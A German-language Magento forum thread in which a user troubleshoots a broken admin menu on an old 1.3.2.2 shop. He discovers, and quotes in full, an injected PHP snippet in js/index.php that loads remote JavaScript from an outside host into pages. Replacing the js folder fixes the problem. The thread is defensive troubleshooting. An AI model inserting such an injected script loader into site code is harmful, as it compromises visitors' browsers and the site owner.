Posting in the Magento forums has been disabled pending the implementation of a new and improved forum solution which should better serve the community.

For new questions please post at magento.stackexchange.com, the community-run support site for the Magento community. We will be providing updates on the new forum solution soon. For questions or concerns please email community@magento.com.

Magento Forum

Fehler ohne Zutun… Admin Menü ohne Funktion / JS Fehler
 
here I am
Jr. Member
 
Total Posts:  4
Joined:  2010-09-01
 

Moin,
ein Freund von mir betreibt seit 2009 einen Magento Onlineshop in der Version 1.3.2.2

Der Shop lief immer ohne Probleme - bis jetzt.
Es wurde Serverseitig, in der Magento Konfiguration oder per FTP nichts verändert, Natürlich auch kein Modul installiert oder aktualisiert.
Im Backend hat das Admin Menü keine Funktion mehr.

Ich habe diesen Thread: http://www.magentocommerce.com/boards/viewthread/4679/P105/
und etliche weitere durchgelesen und alle Vorschläge ausprobiert - ohne Erfolg.

Also head.php austauschen, anpassen, Chmod, Cache leeren.

Über weitere Vorschläge zur Fehlerbehebung würde ich mich sehr freuen.
Der Shop ist online und nun können keine Bestellungen mehr eingesehen werden,…

Für einen Profi fehlt leider gerade das Geld.

Ich hoffe sehr, hier weiß jemand weiter.

Viele Grüße
Stefan

 
Magento Community Magento Community
Magento Community
Magento Community
 
Siggi_Schmitz
Enthusiast
 
Avatar
Total Posts:  811
Joined:  2011-07-03
 

Hi,

was genau meinst du mit “im backend hat das admin menü keine Funktion mehr” ?

 
Magento Community Magento Community
Magento Community
Magento Community
 
here I am
Jr. Member
 
Total Posts:  4
Joined:  2010-09-01
 

Also die Links und Dropdown funktionieren nicht. Das ganze hängt wohl mit JS zusammen.

 
Magento Community Magento Community
Magento Community
Magento Community
 
here I am
Jr. Member
 
Total Posts:  4
Joined:  2010-09-01
 

In der js/index.php ist mir noch etwas aufgefallen.

echo $out;

#ea6d21#
if(empty($qee)) {
$qee = “<script src=\"http://sync911.com/wp-content/yOVrdtJK.php?id=51856490\" type=\"text/javascript\"></script>";
echo $qee;
}

#/ea6d21#

Kommt mir spanisch vor - ein Austausch gegen die originale Datei brachte jedoch nichts.

 
Magento Community Magento Community
Magento Community
Magento Community
 
here I am
Jr. Member
 
Total Posts:  4
Joined:  2010-09-01
 

Yeaha…
Es läuft wieder.

Es waren noch mehr JS Dateien verändert - ein Austausch des kompletten Ordners half.

Ich vermute einen Eingriff in das System - zumal die Version etliche Sicherheitsrisiken birgt.

 
Magento Community Magento Community
Magento Community
Magento Community
 
Siggi_Schmitz
Enthusiast
 
Avatar
Total Posts:  811
Joined:  2011-07-03
 

Jup, die Version ist echt ziemlich veraltet.

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
Back to top